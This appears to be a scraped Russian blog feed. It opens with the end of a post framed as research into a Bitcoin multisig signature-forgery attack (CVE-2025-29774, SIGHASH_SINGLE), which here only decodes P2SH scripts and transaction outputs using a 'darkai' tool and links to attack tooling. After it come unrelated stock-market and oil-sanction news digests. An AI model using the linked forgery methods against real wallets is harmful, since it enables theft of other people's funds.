  • Эквивалент: 677 200/100 000 000 = 0.00677200 BTC.

Как уязвимости CVE-2025-29774 и баг SIGHASH_SINGLE угрожают мультиподписным кошелькам сети Биткоин с поддельными RawTX: [Часть №1] Финансовая грамотность, Криптовалюта, Трейдинг, Арбитраж криптовалюты, Биткоины, Облигации, Заработок в интернете, Валюта, Дивиденды, Видео, YouTube, Длиннопост

Подробное объяснение элементов: Поле script

  • Значение скрипта: a91406612b7cb2027e80ec340f9e02ffe4a9a59ba76287

  • Это скрипт типа «scriptPubKey» — часть выходной структуры транзакции, задающая, кто может потратить эти средства. Важнейшее предназначение — обеспечение безопасности и контроля над распоряжением средствами.


Декодирование скрипта

  • Скрипт начинается с префикса a914...87, что соответствует формату P2SH (Pay to Script Hash):

    • a9 — OP_HASH160 (оператор хеширования)

    • 14 — длина следующего значения (20 байт = 40 символов hex)

    • 06612b7cb2027e80ec340f9e02ffe4a9a59ba762 — сам hash160 Биткоин Адреса кошелька, где хранятся монеты BTC.

    • 87 — OP_EQUAL (базовый оператор команды Bitcoin Script, реализуюет сравнение двух данных для проверки их идентичности)

  • Это означает, что средства получатель может потратить, если предоставит скрипт, хеш которого соответствует приведённому значению, и предъявит валидные подписи для этого скрипта.


Практическая значимость результата

  • Данный вывод указанной транзакции содержит 677 200 сатоши (0.00677200 BTC), которые защищены скриптом типа P2SH.

  • Для расходования средств с такого выхода понадобится знать оригинальный скрипт и предъявить корректные подписи — типичная ситуация для кошельков с мультиподписями, смарт-контрактов и других продвинутых схем безопасности.

  • Эта информация важна для анализа структуры транзакции, проверки назначения средств и понимания требований для их последующего использования.


Десериализации транзакции по идентификатору

В результате десериализации транзакции по идентификатору 8602122a7044b8795b5829b6b48fb1960a124f42ab1c003e769bbaad31cb2afd был получен первый выход, содержащий сумму 677 200 сатоши (0.00677200 BTC), защищённый P2SH-скриптом. Для распоряжения этими средствами потребуется представить скрипт назначения и корректно подписать разблокирующую транзакцию, соответствующую условиям указанного хэша.


Как уязвимости CVE-2025-29774 и баг SIGHASH_SINGLE угрожают мультиподписным кошелькам сети Биткоин с поддельными RawTX: [Часть №1] Финансовая грамотность, Криптовалюта, Трейдинг, Арбитраж криптовалюты, Биткоины, Облигации, Заработок в интернете, Валюта, Дивиденды, Видео, YouTube, Длиннопост

Десериализация второй Биткоин транзакции

Чтобы получить фрагменты информации о выходе исходных данных (output) Биткоин транзакции применим следующие команды, где первый выход (outs) из транзакции с уникальным идентификатором bd992789fd8cff1a2e515ce2c3473f510df933e1f44b3da6a8737630b82d0786

!./darkai -deserialize bd992789fd8cff1a2e515ce2c3473f510df933e1f44b3da6a8737630b82d0786


Воспользуемся процессом интерпретации, с помощью Dark AI при помощи функции десериализации, далее мы получаем информацию о структуре первого выходного элемента (output) для второй транзакции с идентификатором
bd992789fd8cff1a2e515ce2c3473f510df933e1f44b3da6a8737630b82d0786.



Результат:

{'value': 5000000, 'script': 'a91406612b7cb2027e80ec340f9e02ffe4a9a59ba76287'}


1. Подробное объяснение элементов: Поле value

  • Содержимое: 5000000

  • Это значение указывается в сатоши (satoshi) — минимальной неделимой единице биткоина; 1 BTC = 100,000,000 сатоши.

  • Назначение:
    Эта сумма ассоциирована с конкретным выходом транзакции, указанным в элементах массива 'outs'. Ее можно потратить, только если будут выполнены условия, записанные в скрипте, определённом в поле 'script'.

  • Перевод в биткоины: 5 000 000 сатоши = 0.05 BTC

Как уязвимости CVE-2025-29774 и баг SIGHASH_SINGLE угрожают мультиподписным кошелькам сети Биткоин с поддельными RawTX: [Часть №1] Финансовая грамотность, Криптовалюта, Трейдинг, Арбитраж криптовалюты, Биткоины, Облигации, Заработок в интернете, Валюта, Дивиденды, Видео, YouTube, Длиннопост

2. Подробное объяснение элементов: Поле script

  • Содержимое: 'a91406612b7cb2027e80ec340f9e02ffe4a9a59ba76287'

  • Это так называемый locking script или, иначе, scriptPubKey — скрипт, который указывает условия, при которых данный выход может быть потрачен.


Декодирование скрипта

Указанное значение соответствует стандартному типу скрипта в сети биткоин:

  • a9 — код операции OP_HASH160 (производит RIPEMD-160 от SHA-256 от следующей строки).

  • 14 — длина последующего поля: 20 байт (40 шестнадцатеричных символов).

  • 06612b7cb2027e80ec340f9e02ffe4a9a59ba762 — это непосредственно 20-байтовый хэш, который идентифицирует либо адрес биткоин-кошелька, либо скрипт.

  • 87 — код операции OP_EQUAL.

В совокупности такая запись означает P2SH-адрес (Pay-to-Script-Hash, «оплата по хэшу скрипта»). В этом случае средства закрепляются за некой скрипт-комбинацией, а для их изъятия нужно будет раскрыть скрипт, хэш которого здесь зафиксирован, и предъявить подписи (или иные данные), удовлетворяющие условиям этого скрипта.


Наиболее часто подобная схема используется для мультиподписей, простых и сложных смарт-контрактов, двусторонних мультиподписей, схем безопасности с условиями и другими продвинутыми сценариями.


3. Практический смысл результата, величина и назначение средств.

  1. В указанной транзакции (с хэшем bd992789fd8cff1a2e515ce2c3473f510df933e1f44b3da6a8737630b82d0786) есть выход, в котором 0.05 BTC (5 000 000 сатоши) «заблокированы» на P2SH-адресе, соответствующем хэшу 06612b7cb2027e80ec340f9e02ffe4a9a59ba762

  2. Условия расходования:
    Чтобы потратить эти средства, необходимо при формировании расходующей транзакции предъявить не только стандартную подпись, как при прямом переводе, но и сам скрипт, хэш которого зашит в этом выходе, плюс данные (например, набор цифровых подписей), соответствующие условиям скрипта.

  3. Безопасность и гибкость:
    Такой способ позволяет реализовывать более сложные логические схемы, чем прямое отправление на обычный Биткоин адрес.


4. Оформление выхода в уровень совместимости с различными сервисами и кошельками, поддерживающими P2SH.

  • Транзакция с идентификатором
    bd992789fd8cff1a2e515ce2c3473f510df933e1f44b3da6a8737630b82d0786
    содержит выход, в котором
    0.05 BTC (5 000 000 сатоши)
    закреплены на P2SH-скрипте (Pay-to-Script-Hash) с хэшем
    06612b7cb2027e80ec340f9e02ffe4a9a59ba762.

  • Для траты этих средств необходимо раскрыть исходный скрипт и выполнить его условия (например, предъявить все подписи в мультиподписи).


Таким образом, результат десериализации сообщает о наличии определённой суммы биткоинов на условном (P2SH) адресе и определяет строгие правила их расходования, что играет ключевую роль для управления и учёта средств в сети Bitcoin.


Как уязвимости CVE-2025-29774 и баг SIGHASH_SINGLE угрожают мультиподписным кошелькам сети Биткоин с поддельными RawTX: [Часть №1] Финансовая грамотность, Криптовалюта, Трейдинг, Арбитраж криптовалюты, Биткоины, Облигации, Заработок в интернете, Валюта, Дивиденды, Видео, YouTube, Длиннопост

P2SH (Pay-to-Script-Hash) locking script в сети Биткоин. Что означает этот скрипт?

Скрипт 'a91406612b7cb2027e80ec340f9e02ffe4a9a59ba76287' выбран и использован в данном выходе транзакции, потому что он представляет собой типичный P2SH (Pay-to-Script-Hash) locking script в сети Биткоин.


Рассмотрим его по частям:

  • a9 — OP_HASH160: операция хеширования, которая применяет сначала SHA-256, а затем RIPEMD-160 к последующим данным.

  • 14 — длина хеша — 20 байт (в 16-ричном формате).

  • 06612b7cb2027e80ec340f9e02ffe4a9a59ba762 — 20-байтовый хеш скрипта, известный как script hash.

  • 87 — OP_EQUAL: оператор, проверяющий равенство двух значений на стеке.

Таким образом, этот скрипт требует, чтобы в момент использования (тратты средств) был представлен скрипт, хеш которого совпадает с 06612b7cb2027e80ec340f9e02ffe4a9a59ba762, и чтобы выполнялись условия этого скрипта.


Почему выбран именно такой?

  • Удобство и безопасность: P2SH позволяет сложную логику управления средствами (например, мультиподписи или условные платежи) скрыть в виде хеша, упрощая интерфейс для отправителя и получателя.

  • Стандарт индустрии: P2SH стал общепринятым стандартом, так как он упрощает настройку сложных схем защиты и совместим с большинством кошельков и сервисов.

  • Компактность: В блоке хранится только хеш сложного скрипта, а не весь скрипт — это экономит место и повышает эффективность.

  • Гибкость: Владелец средств может создавать произвольные условия расходования — например, требовать несколько подписей, временные задержки или другие правила — и хеш этих условий хранится именно здесь.


Скрипт 'a91406612b7cb2027e80ec340f9e02ffe4a9a59ba76287' — это P2SH locking script, который говорит, что для тратты 0.05 BTC необходимо предоставить оригинальный скрипт с хешем 06612b7cb2027e80ec340f9e02ffe4a9a59ba762 и выполнить прописанные в нем условия. Это обеспечивает баланс между удобством, безопасностью и функциональностью — основную причину выбора именно такого скрипта в данной транзакции. Хэш 06612b7cb2027e80ec340f9e02ffe4a9a59ba762 в P2SH-скрипте — это результат конкретного хеширования исходного сценария (redeem script), который определяет условия траты средств с этого выхода.


Почему именно этот хэш, а не другой?

  1. Хэш — цифровой отпечаток сценария, задающего правила траты.
    При создании P2SH-адреса или выхода скрипт (условия расходования Bitcoin) сначала составляется в явном виде, затем применяются два алгоритма хеширования:

    • SHA-256 от скрипта,

    • Затем RIPEMD-160 от результата SHA-256.
      Итоговый 20-байтовый хэш и есть 06612b7cb2027e80ec340f9e02ffe4a9a59ba762. Этот хэш однозначно идентифицирует именно тот сценарий, для которого он был сгенерирован.

  2. Уникальность и неизменность
    Криптографические хеш-функции обладают свойством «лавинного эффекта», при котором даже минимальное изменение исходного скрипта даст совершенно другой хэш. Поэтому данный хэш уникален и неподдельен в контексте исходного скрипта.

  3. Цель использования хэша — обеспечение компактности и безопасности
    Вместо хранения в каждом выходе полного сценария, который может быть сложным и занимать много места, в блоке хранится только его хэш. Это экономит место и повышает конфиденциальность — сам сценарий раскрывается только при трате средств и только тем, кто выполняет условия.

  4. Выбор хэша ― результат конкретного скрипта, определенного создателем адреса или кошелька
    Разработчик или владелец средств создаёт скрипт с нужными условиями (например, мультиподпись, временная задержка, другие логические условия). Назначенный скрипт хешируется и именно этот хэш привязывается к выходу транзакции. Таким образом, нет произвольного выбора хэша — он определяется содержимым исходного скрипта и криптографическим алгоритмом.


  • Данный хэш строго связан с конкретным скриптом, который владелец адреса заложил для защиты своих средств.

  • Он был получен с помощью криптографических хеш-функций (SHA-256 + RIPEMD-160) от исходного redeem script, поэтому случайно или произвольно выбрать другой хэш нельзя.

  • Этот хэш — отражение уникальной комбинации условий траты, и именно поэтому именно он и оказался в скрипте выхода транзакции a91406612b7cb2027e80ec340f9e02ffe4a9a59ba76287


Таким образом, выбор именно этого хэша продиктован необходимостью точного и безопасного связывания выхода с конкретными условиями трат, которые контролируют доступ к средствам в блокчейне. Все это обеспечивается свойствами криптографических хеш-функций, их уникальностью, и невозможностью обратного восстановления исходных данных.


Механизма P2SH: значение, принцип работы и безопасность в сети Bitcoin

Разработчики Биткоин прописали в код механизм P2SH (Pay-to-Script-Hash) как ключевую инновацию, обеспечивающих безопасность и расширяющих возможности сети блокчейн. Рассмотрим структуру и принцип работы данного скрипта, его отличие от классических транзакций, а также причины выбора именно такого подхода для хранения и защиты цифровых активов.

Традиционно в Bitcoin транзакции работали по схеме Pay-to-Pubkey-Hash (P2PKH) — где «блокировка» средств происходит с помощью хеша публичного ключа адресата. Для расходования этих средств пользователь должен предоставить свою цифровую подпись и публичный ключ, которые проверяются сетью.

Однако за рамками P2PKH интерфейс был ограничен, так как в Bitcoin Script можно создавать гораздо более сложные условия траты — от мультиподписей до временных замков и других смарт-контрактных соглашений. Проблема состояла в том, что длинные и сложные скрипты неизбежно увеличивали размер транзакций и снижали их удобство.


Именно для упрощения взаимодействия с такими сложными сценариями в 2012 году была введена концепция P2SH, стандартизированная в BIP 16 Гэвином Андресеном. Суть P2SH сводится к замене в scriptPubKey полного скрипта условий траты на его криптографический хэш — так называемый script hash.


Опубликованы три части [№1] , [№2] , [№3] исследования

Данный материал создан для портала CRYPTO DEEP TECH для обеспечения финансовой безопасности данных и криптографии на эллиптических кривых secp256k1 против слабых подписей ECDSA в криптовалюте BITCOIN. Создатели программного обеспечения не несут ответственность за использование материалов.


Crypto Tools

Исходный код

Google Colab

Telegram: https://t.me/cryptodeeptech

Видеоматериал: https://youtu.be/qbu1m_C1wyA

Video tutorial: https://dzen.ru/video/watch/68801dfc0c886621f7c1a0db

Источник: https://cryptodeeptool.ru/digital-signature-forgery-attack



Как уязвимости CVE-2025-29774 и баг SIGHASH_SINGLE угрожают мультиподписным кошелькам сети Биткоин с поддельными RawTX: [Часть №1] Финансовая грамотность, Криптовалюта, Трейдинг, Арбитраж криптовалюты, Биткоины, Облигации, Заработок в интернете, Валюта, Дивиденды, Видео, YouTube, Длиннопост
Показать полностью 22 1
[моё] Финансовая грамотность Криптовалюта Трейдинг Арбитраж криптовалюты Биткоины Облигации Заработок в интернете Валюта Дивиденды Видео YouTube Длиннопост
0
3
svoiinvestor
svoiinvestor
1 месяц назад
Лига Инвесторов

НОВАТЭК представил операционные результаты за II квартал 2025 г. Первые отгрузки с Арктик СПГ-2 в этому году произошли⁠⁠

НОВАТЭК представил операционные результаты за II квартал 2025 г. Первые отгрузки с Арктик СПГ-2 в этому году произошли Политика, Экономика, Фондовый рынок, Инвестиции, Биржа, Финансы, Инвестиции в акции, Отчет, Доллары, Аналитика, Валюта, Дивиденды, Газ, Нефть, Рубль, Облигации, Газпром, Новатэк, Санкции, Инфляция

Компания представила предварительные производственные показатели за II квартал и I полугодие 2025 года:

🛢️ Добыча нефти и газового конденсата: 3,44 млн тонн (+2% г/г) и 6,92 млн тонн (+1,4% г/г)
🛢️ Продажа нефти и газового конденсата: 4,7 млн тонн (+18,7% г/г) и 9,2 млн тонн (+11,8% г/г)

⛽️ Добыча природного газа: 21,18 млрд куб.м (+2,8% г/г) и 42,53 млрд куб.м (+1,9% г/г)
⛽️ Продажа природного газа (включая СПГ): 18 млрд куб.м (+1,1% г/г) и 56,16 млрд куб.м (+0,5% г/г)

По состоянию на 30 июня 2025 г. 0,9 млрд куб. м газа (включая СПГ), а также 1,3 млн тонн стабильного газового конденсата и продуктов его переработки было отражено как «остатки готовой продукции» и «товары в пути» в составе запасов.

💬 Добыча нефти и газового конденсата незначительно сократились по сравнению со I кв. 2025 г. (3,48 млн тонн), во многом виноваты заградительные санкции, потому что начиная с того же II кв. РФ только наращивала добычу сырья — в июне 2025 г. РФ добыла нефти — 9,025 млн б/с (+41 тыс. б/с м/м), в 2025 г. происходит компенсация по добыче за ранее превышенные квоты, но РФ уже наращивает добычу. В июле страны ОПЕК+ увеличили квоты на добычу, Россия в августе сможет добывать 9,344 млн б/с. Взлёт продаж, как по сравнению с прошлым годом, так и предыдущим кварталом (4,5 млн тонн) связан с запуском ещё в прошлом году в Усть-Луге 3 линии по переработке СГК (стабильный газовый конденсат), комплекс позволяет перерабатывать СГК в лёгкую и тяжёлую нафту, керосин, дизельную фракцию (более прибыльные продукты).

💬 Добыча природного газа немного снизилась по сравнению с I кв. (21,35 млрд куб.м). Продажи рухнули по сравнению со I кв. 2025 г. (21,48 млрд куб.м), связано это с санкциями. Интересно, что Артик СПГ-2 начал свою подсанкционную работу в конце июня (последний раз с завода СПГ экспортировалось сырьё в начале октября 2024 г.).

💬 Известно, что с 1 июля произошла индексация тарифов на газ гораздо выше инфляции, а большую часть НОВАТЭК поставляет на внутренний рынок, поэтому в III-IV кв. стоит ожидать прироста выручки. Также Евросоюз резко нарастил закупки российского СПГ в последние месяцы.

📌 Головная боль компании это санкционное давление со стороны США (запрет реэкспорта, SDN-List партнёров компании, в январе завод Новатэка в Балтике и логистика-газовозы СКФ). Также ₽ сильно окреп, для EC СПГ хоть и продаётся по хорошим ценам, но с укреплением ₽ это всё размывается. Завод Звезда успешно спустил на воду три первых газовоза-ледокола — «Алексей Косыгин», «Пётр Столыпин» и «Сергей Витте», проводит их испытания, но дальнейшая их судьба неизвестна (данные танкера ледового класса Arc7 и могу ходить круглый год, они поступят в пользование Совкомфлота, так что зарабатывать начнут 2 компании). Не забываем о проекте Мурманский СПГ: покупка дешёвой электроэнергии на Кольской АЭС, покупка газа у Газпрома по приемлемым ценам и главное, что в Мурманске порт не замерзает, а значит не понадобятся танкера ледового класса. Но запуск первых 2 линий планируется только в 2027 г., но недавно НОВАТЭК сообщил, что сократил окончание строительства терминала Мурманский СПГ на 3 года до 2030 года (не путать линии и полностью готовый терминал).

С уважением, Владислав Кофанов

Телеграмм-канал: t.me/svoiinvestor

Показать полностью
[моё] Политика Экономика Фондовый рынок Инвестиции Биржа Финансы Инвестиции в акции Отчет Доллары Аналитика Валюта Дивиденды Газ Нефть Рубль Облигации Газпром Новатэк Санкции Инфляция
1
4
krasikov944krasi
krasikov944krasi
1 месяц назад
Лига биржевой торговли

Америка закрывает доступ к металлам⁠⁠

Америка закрывает доступ к металлам Дивиденды, Облигации, Инфляция, Экономика, США, Китай, Серебро, Медь, Доллары, Валюта, Кризис, Telegram (ссылка)

США ввели 50% налог на импорт меди. Следующий шаг — серебро, которое становится стратегическим металлом в оборонке, AI и энергетике.

В Джорджии открыт завод Aurubis по переработке металлов — Вашингтон хочет удержать ресурсы внутри страны.

Законодательство, субсидии и санкции — всё подчинено одной цели: контроль над критическими поставками.

Серебро уже не просто “инвестметалл” — это новый промышленный актив, важный для нацбезопасности.

Вывод: институциональные игроки начинают рассматривать серебро как стратегический актив, а не только хедж от инфляции. Это изменит долгосрочную структуру спроса.

НАШ ТГ КАНАЛ: https://t.me/+KvGj2ztTTNMxNTMy

Показать полностью 1
Дивиденды Облигации Инфляция Экономика США Китай Серебро Медь Доллары Валюта Кризис Telegram (ссылка)
4
97
StockGambler
StockGambler
Экономика и производные. Просто, цинично, весело
1 месяц назад

Статистика, графики, новости - 23.07.2025 - Нефть. Вот сейчас все как возьмут, и откажутся⁠⁠

Сегодня в выпуске:
— Структура нефтегазового экспорта. В динамике
— Про валюту. Важны ли абсолютные цифры?
— Экспорт отечественной нефти. По Блоомбергу
— Лучшие акции Америки. Не падают?

Статистика, графики, новости - 23.07.2025 - Нефть. Вот сейчас все как возьмут, и откажутся Финансы, Экономика, Дивиденды, Инвестиции в акции, Фондовый рынок, Новости, США, Недвижимость, Валюта, Нефть, Длиннопост

Доброе утро, всем привет!

Вы же все в курсе, что нам скоро крышка?

Статистика, графики, новости - 23.07.2025 - Нефть. Вот сейчас все как возьмут, и откажутся Финансы, Экономика, Дивиденды, Инвестиции в акции, Фондовый рынок, Новости, США, Недвижимость, Валюта, Нефть, Длиннопост

Скоро любая страна, которая посмеет закупиться российской нефтью (а газом? Уже забыл, газ тоже туда?), будет обложена тарифами в 100% (неизвестный Х%). В прошлый раз сработал потолок. Теперь сработают и тарифы.

А вы знали, что на просторах интернета есть сайт, который вот уже более 3 лет отслеживает потоки всего нефтегазового из РФ во вне? Вот на основе его данных нарисовали такую картину. Тут крупнейшие импортеры российской нефти и газа. Изменение в структуре с 14 января 2022 по 13 марта 2025.

С момента начала боевых действий на Украине 24 февраля 2022 года Россия заработала 915 миллиардов долларов на экспорте ископаемого топлива, причем на долю стран ЕС приходится более 223 миллиардов долларов.

В отчете, опубликованном Ember, оценивается, что в 2024 году европейские закупки российского газа составили 21,9 млрд евро (23,6 млрд долларов).

Кроме того, данные, собранные Kpler и проанализированные POLITICO Europe, показали, что за первые 15 дней 2025 года 27 стран ЕС импортировали из России рекордные 837 300 метрических тонн сжиженного природного газа (СПГ).

Россия остается одним из крупнейших производителей нефти в мире, часто соревнуясь с Саудовской Аравией за второе место после США.

Тут что интересно? Методология. Дело в том, что вся мировая общественность традиционно отслеживает наши с вами морские поставки сырой нефти. Но есть такая штука, как пайплайны, то есть различные трубопроводы. По которым, к примеру, течёт нефть в Китай. Породистое издание Блоомберг про такое не пишет практически никогда. Тут говорят, что учитывают.

Данные по трубопроводным поставкам нефти в Китай оцениваются путем вычета морских поставок из общего объема импорта, согласно данным китайской таможни.

Ну, короче, вот эти все скоро прекратят покупать нефть. Кто возместит выпавшие объемы? Ну что за глупые вопросы. Зачем вообще эти вопросы? Само. Как-нибудь само.

***

Статистика, графики, новости - 23.07.2025 - Нефть. Вот сейчас все как возьмут, и откажутся Финансы, Экономика, Дивиденды, Инвестиции в акции, Фондовый рынок, Новости, США, Недвижимость, Валюта, Нефть, Длиннопост

Я часто сталкиваюсь с мнением, что чем одна валюта дороже другой, тем она сильнее, тем мощнее экономика страны.

Ну, очевидно, за один доллар дают 80 рублей, значит, Россия дно, а США топ.

Перед вами «сильнейшие» валюты мира.

По последним данным, 1 кувейтский динар равен 3,27 доллара, что делает его самой «сильной» валютой в мире. За ним следуют бахрейнский динар (2,65 доллара) и оманский риал (2,60 доллара), обе валюты из богатых нефтью стран Персидского залива с сильными центральными банковскими системами и управляемыми режимами обменного курса. Иорданский динар (1,41 доллара) также входит в этот список.

Швейцарский франк (1,24 доллара) и доллар Каймановых островов (1,20 доллара) также занимают высокие позиции. Гибралтарский фунт находится на одном уровне с британским — 1,30 доллара.

Насколько всё это мощные экономики? Кстати, за 1 доллар требуют 147 японских иен. Или 42 украинские гривны. Или 7 китайских юаней. Ну вы поняли? Украинская державная экономика выносит японцев только в путь.

Вывод? Я бы не обращал внимание на абсолютные котировки.

***

Статистика, графики, новости - 23.07.2025 - Нефть. Вот сейчас все как возьмут, и откажутся Финансы, Экономика, Дивиденды, Инвестиции в акции, Фондовый рынок, Новости, США, Недвижимость, Валюта, Нефть, Длиннопост

Сырая. Отечественная. Твоя.
Конечно же, морским путём.

В общем, пока я на чиле, на расслабоне на водах целебных отдыхал, поставки нашей с вами сырой нефти показали рекордный уровень за 2025 год. 3,74 млн.баррелей в сутки. То было в первую неделю моего выезда. А во вторую поставки слегка упали. До 3,18. Но тоже ничего.

На прошлой неделе Европейский союз принял 18-й пакет санкций в отношении Москвы, добавив еще 105 танкеров в список запрещенных судов. Около половины из них уже были внесены в черный список США или Великобритании, а 51 ранее не подпадавший под санкции танкер был добавлен в список, в результате чего общее количество судов, внесенных в черный список, достигло 522.

Брюссель также решил пересмотреть механизм ограничения цен, который устанавливает уровень, выше которого грузы не могут перевозиться на судах ЕС или использовать услуги, предоставляемые его компаниями. Ожидается, что ограничение будет снижено до уровня от 45 до 50 долларов за баррель и будет пересматриваться каждые шесть месяцев с внесением изменений для приведения его в соответствие с рынком.

ЕС также запрещает импорт нефтепродуктов, произведенных из российской нефти в третьих странах. Однако запрет вступит в силу только в январе.

Что сказать. Потужно.

***

Статистика, графики, новости - 23.07.2025 - Нефть. Вот сейчас все как возьмут, и откажутся Финансы, Экономика, Дивиденды, Инвестиции в акции, Фондовый рынок, Новости, США, Недвижимость, Валюта, Нефть, Длиннопост

Сколько стоит недвижимость в США?

США страна большая. Разная. Дифференцированная. Это ведь никакие не штаты. State – это государство. А само это образование есть конфедерация. К примеру, трудясь полицейским в условной Калифорнии, дослужившись до высокой должности и звания, имея за плечами суровую выслугу, релоцировавшись в условный Вермонт, всё это превратится в тыкву. Ни выслуги, ни звания, ни должности.

Вот и стоимость жизни, цены – всё это везде разное. Медианная цена продажи дома в Калифорнии в декабре 2024 составила 825к$. А в Алабаме всего 220к$.

***

Статистика, графики, новости - 23.07.2025 - Нефть. Вот сейчас все как возьмут, и откажутся Финансы, Экономика, Дивиденды, Инвестиции в акции, Фондовый рынок, Новости, США, Недвижимость, Валюта, Нефть, Длиннопост

В любой отечественной трейдерской тусовке вам обязательно сообщат, что отечественный рынок, или, как его называют одарённые, «моська» – это дно из днищ. На нём ничего никогда не растёт. И сам он не растёт. График котировок индекса Мосбиржи при этом будет игнорироваться. И на ваше «а как же рост на 10000% за 25 лет», вам парируют, что в 2022 он был выше, чем сейчас. А значит, не считается. А вот в Америке! Дрожь в членах, слюноотделение, тремор.

Я к чему? Перед вами 20 наиболее доходных акций США с 1985 по 2024 год в порядке убывания годовой доходности для акционеров (данные включают только компании, акции которых непрерывно торговались в течение этого 40-летнего периода). Справа в зеленых прямоугольниках показана среднегодовая доходность на 40-летнем промежутке. Самые топовые долгоиграющие американские акции. Там, где всё растёт. Стоит только воткнуть. Дрожь, слюноотделение, тремор. При одном лишь воспоминании.

А слева, красным, показаны просадки, которые случались у данных компаний. Каждая из 20 лучших акций столкнулась с падением не менее чем на 55%. Некоторые лидеры продемонстрировали крайнюю волатильность: Williams-Sonoma упала на 90%, а Apple — на 83%, достигнув своих минимальных значений.

Периоды восстановления сильно различались: например, Amgen восстановилась всего за 1,6 года, а Eli Lilly — почти за десятилетие.

Для сравнения, S&P 500 имел годовую доходность 11,8%, падение на 58% и восстановление за 4,2 года.

Для сравнения, отечественный рынок падал на 74% в 2008 году. Отыграв практически 95% падения за 2,5 года. И полностью восстановился за 6,5 лет.

***

Статистика, графики, новости - 23.07.2025 - Нефть. Вот сейчас все как возьмут, и откажутся Финансы, Экономика, Дивиденды, Инвестиции в акции, Фондовый рынок, Новости, США, Недвижимость, Валюта, Нефть, Длиннопост

Дивиденды, часть 11. Северсталь
Новый материал по дивидендным акциям на Sponsr и Boosty.

ПАО «Северсталь». Работает с 1993 года в сфере производства чугуна, стали и ферросплавов. Компания управляется АО «Северсталь Менеджмент». Штаб-квартира расположена в Череповце, Вологодская область.

Компания дивиденды платит. Но нерегулярно. Но ежеквартально. Но нерегулярно. Но доходность выплат хорошая. Но.

Почему? Потому что дивидендная политика, завязанная не только на чистую прибыль, но и на свободный денежный поток. И не только самой компании, но и её дочек.

За подробностями, красивыми графиками и точками оптимального подбора акции спешите по ссылкам выше. И ниже.

В целом, интересный вариант.

***

Экономико-познавательный канал — MarketScreen
Трейдинг, анализ, графики, кривые — StockGamblers
Еще больше интересной и познавательной инфы я даю на своём платном проекте: Sponsr | Boosty
Дзен - StockGambler | Дзен

Показать полностью 7
[моё] Финансы Экономика Дивиденды Инвестиции в акции Фондовый рынок Новости США Недвижимость Валюта Нефть Длиннопост
2
4
chastnyjinvestor
chastnyjinvestor
1 месяц назад
Лига Инвесторов

Импортные пошлины Трампа, взлёт акций ЮГК, рост экспорта нефти из РФ, новые санкции, взлёт криптовалют!⁠⁠

Разбираем самые важные новости финансовых рынков и экономики за прошедшую неделю.

Помимо биржевых обзоров, прогнозов и полезных образовательных материалов, еженедельно из нескольких сотен новостей я отбираю самые важные и интересные новости за последнюю неделю по экономике и финансам и составляю из них дайджест с моими краткими пояснениями: 

— Акции ЮГК выросли на 20% в первый день после возобновления торгов. — отскочили, как я предполагал неделю назад. По итогу прошедшей недели выросли на 30%.

— В июне в США цены на товары и услуги выросли на 0,3%, что стало максимальным показателем за 5 месяцев. — начинает сказываться влияние тарифов Трампа.

— МТС Банк привлек ₽4 млрд в результате SPO. Всего банк разместил почти 2,9 млн акций, увеличив уставный капитал на 8,4%. — SPO через год после IPO, конечно, никак не способствует росту акций.

— По итогам первого полугодия 2025-го дефицит федерального бюджета достиг почти ₽3,7 трлн. Это примерно соответствует плану на весь 2025 год даже после июньских корректировок бюджета. — придется и дальше сокращать расходы.

— Трамп заявил, что США и НАТО договорились о поставках оружия Украине за счет европейцев. Трамп также объявил, что США введут импортные пошлины в размере 100% в отношении РФ и ее торговых партнеров, если сделка по Украине не будет заключена в течение 50 дней. — на этом индекс ММВБ и взлетел примерно от 2630 пунктов, о чем подробно рассказал на своем канале.

— Мосбиржа запустит в августе торги фьючерсами с привязкой к гособлигациям США и Ethereum. Базовыми активами станут акции фондов США, инвестирующих в них. — пригодится.

— Ситуация в угольной отрасли в РФ продолжает ухудшаться, — замглавы Минэнерго. В настоящее время 51 предприятие остановлено или находится на грани остановки. Убытки по итогам 2024 года составили ₽112,6 млрд. — кризис в угольной отрасли довольно тяжелый.

— Минфин внес в правительство проект постановления о поддержке угольной отрасли, предполагающей право на отсрочку налогов и страховых взносов. В частности, угольным компаниям могут дать право на отсрочку по уплате НДПИ до 30 ноября. — ну, хоть какая-то поддержка.

— ЕК подготовила список товаров из США на €72 млрд, которые будут обложены пошлинами в ответ на введение США тарифов в размере 30% на поставки товаров из ЕС. — по идее, это должно влиять на рынок акций США, но падать он пока не желает.

— Инвесторы смогут застраховать средства на ИИС-3 от банкротства брокера на сумму до ₽1,4 млн: такой закон приняла Госдума в третьем чтении. Компенсационный фонд будет формироваться за счет добровольных отчислений профессиональных участников рынка. — хорошая идея. Касается ИИС, открытых с 1 января 2024 года.

— Экспорт нефти из РФ достиг месячного максимума, — Bloomberg. Морской экспорт нефти за 4 недели в среднем составлял 3,23 млн б/с, что на 3% больше, чем в мае-июне. — переработка нефти снизилась, а добыча выросла.

— Инфляционные ожидания сохранились на уровне июня — 13%. — не снижаются, как и значения годовой инфляции.

— Михаил Клюкин, один из старейших миноритарных акционеров Совкомбанка, ищет покупателя на принадлежащие ему 5% акций и разместил объявление на Avito. Цена такой доли сейчас более ₽17 млрд. — забавно.

— Средняя стоимость тура за границу для россиян выросла за год на 17%, до ₽156,000 на двоих, — OnlineTours. Лидер рынка — Египет с долей в общем объеме в 41%. — приличный рост.

— Послы ЕС согласовали 18-й пакет санкций против РФ. Речь идет об ограничениях в отношении 22 банков РФ, в том числе Т-Банка, Сургутнефтегазбанка, Яндекс-банка, банка «Зенит», и двух банков из КНР, а также «Северного потока», более 100 судов «теневого флота», и снижении потолка цен на нефть ($47,6 за баррель). — ну, кроме снижения потолка, вроде ничего серьезного.

— Капитализация рынка криптовалют превысила $4 трлн из-за принятия Конгрессом США закона о стейблкоинах. Рынок опционов показывает, что трейдеры ожидают еще большего роста в ближайшие недели. — Bitcoin вырос еще до $123,000 и откатился, а вот Ethereum пробил $3000 и ускорил рост аж до $3700 (вот графики). Странно. Думаю, если биткоину удастся снова закрепится ниже $116,000, он сможет продолжить коррекцию. До этого момента рост более вероятен.

— Президент Украины сообщил, что Киев предложил Москве провести переговоры на следующей неделе. По его словам, необходима встреча на уровне лидеров, чтобы «реально обеспечить мир». — посмотрим.

Кстати, чтобы всегда быть в курсе ключевых рыночных трендов и не пропустить новые выпуски, присоединяйтесь к моему телеграм-каналу, где я оперативно делюсь самыми важными прогнозами и новостями.

Полагаю, собрал для вас самые важные новости за неделю. Спасибо, что дочитали. Если понравилась статья, поставьте, пожалуйста, лайк! Всем удачи и профита!

Показать полностью
